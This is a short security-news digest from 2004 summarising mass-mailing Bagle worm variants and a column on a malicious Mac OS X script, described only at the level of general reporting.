Like previous Bagle iterations, they are mass-mailing bugs that contain their own SMTP engine to build outgoing messages. They collect e-mail addresses from local files and then use those addresses to replicate themselves. [Click here for Full Story]

Mac and Linux Not Immune to Viruses (Ziff Davis) 11/01/04
It's easy for administrators and computing professionals to get frustrated with users for all kinds of reasons, but security has to be one of the biggest reasons these days.

Let's consider the recent release of a malicious script for Mac OS X. This script itself is not really much of a threat because it has no means of propagation, but as a Mac admin I'd take that as small comfort. The script is a tool for building genuine worms with social engineering as the front door.  [Click here for Full Story]